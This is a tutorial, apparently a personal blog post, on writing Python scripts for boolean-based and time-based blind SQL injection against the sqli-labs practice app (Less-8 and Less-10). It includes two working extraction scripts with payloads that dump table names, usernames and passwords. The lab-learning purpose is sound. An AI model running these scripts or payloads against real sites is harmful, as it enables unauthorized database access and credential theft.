SQL blind injection scripts


November 23, 2021

Writing SQL injection scripts in Python

Boolean-based and time-based blind injection only leak one true/false answer per request, so every character has to be tested value by value. That is where a Python script comes in.

Boolean-based blind injection

Taking sqli-labs Less-8 as the example.

![picture](D:.\picture\屏幕截图 2021-10-25 122458.png)

When the injected query returns a row the page prints "You are in..........."; when it returns nothing the page is blank.

![picture](D:\p\picture\屏幕截图 2021-10-25 161517.png)

That behaviour is the oracle. With the payload `and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=123`

the page says "You are in" only if the first character of the table-name list has ASCII code 123.

Moving the `substr()` offset forward one position at a time and trying every code at each position recovers the full table name.

Doing that by hand is tedious, so we write a Python script instead.

```python
import requests  # HTTP client used for every probe

s = requests.session()  # one session so cookies and keep-alive are reused
# Less-8 wraps id in single quotes, so the closing quote is already part of the base URL
url = "http://localhost/sqli-labs-master/Less-8/?id=1'"
SUCCESS = 'You are in...........'  # text Less-8 prints when the query returns a row


def o(g):
    """Find a length: append 1..99 to the payload prefix g until the page says the condition is true."""
    for i in range(1, 100):
        payload = g + str(i) + '--+'  # --+ decodes to '-- ' and comments out the rest of the query
        if SUCCESS in s.get(url + payload).text:
            print('length: ' + str(i))
            return i
    return 0  # nothing in range matched


def no(k, i):
    """Extract up to i characters: for each position x, try ASCII codes until the page says true."""
    lib = ''
    for x in range(1, i + 1):
        for n in range(1, 256):  # ascii() of one character is 0..255
            payload = k + str(x) + ",1))=" + str(n) + "--+"
            if SUCCESS in s.get(url + payload).text:
                lib = lib + chr(n)
                print("data: " + lib)
                break
        else:
            break  # no code matched: the string ended before position x
    return lib


# leng = o('and length(database())=')
# dbname = no("and ascii(substr(database(),", leng)
# tablename = no("and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),", 30)
# columnname = no("and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),", 100)
# password = no("and ascii(substr((select group_concat(password) from users),", 200)
name = no("and ascii(substr((select group_concat(username) from users),", 200)
```

![](D:\p\picture\屏幕截图 2021-10-25 165010.png)

The data is recovered.

Time-based blind injection

Taking sqli-labs Less-9 as the example: whatever you send, the page only ever shows "You are in", so the page content carries no signal and time-based blind injection is needed. MySQL's `sleep()` delays the response by the requested number of seconds, and that delay becomes the oracle. Note that the script below targets Less-10, which wraps id in double quotes, rather than Less-9, which uses single quotes; the only difference between the two is the closing quote at the end of the base URL.

```python
import requests
import time

s = requests.session()
# Less-10 wraps id in double quotes; for Less-9 change the trailing " to '
url = 'http://localhost/sqli-labs-master/Less-10/?id=1"'
SLEEP = 5            # seconds the server is told to sleep when the guess is right
THRESHOLD = SLEEP - 1  # anything slower than this counts as "slept"; keep it well above normal latency


def slow(payload):
    """Send one probe and report whether the response took longer than THRESHOLD."""
    start = time.time()  # timestamp before sending
    s.get(url + payload)
    return time.time() - start > THRESHOLD  # response time is the only signal this page gives


def o(g):
    """Find a length: the page always says 'You are in', so only the delay reveals truth."""
    for i in range(1, 100):
        if slow(g + str(i) + ",sleep(" + str(SLEEP) + "),1)--+"):
            print('length: ' + str(i))
            return i
    return 0


def no(k, i):
    """Extract up to i characters, one ASCII code at a time, using the delay as the oracle."""
    lib = ''
    for x in range(1, i + 1):
        for n in range(1, 256):
            payload = k + str(x) + ",1))=" + str(n) + ",sleep(" + str(SLEEP) + "),1)--+"
            if slow(payload):
                lib = lib + chr(n)
                print("data: " + lib)
                break
        else:
            break  # no code matched: the string ended before position x
    return lib


# if(a, b, c) evaluates to b when a is true and c otherwise, so only a correct guess runs sleep()
j = no("and if(ascii(substr((select group_concat(username) from users),", 200)
```

![](D:\p\picture\屏幕截图 2021-10-25 171419.png)

The result is recovered.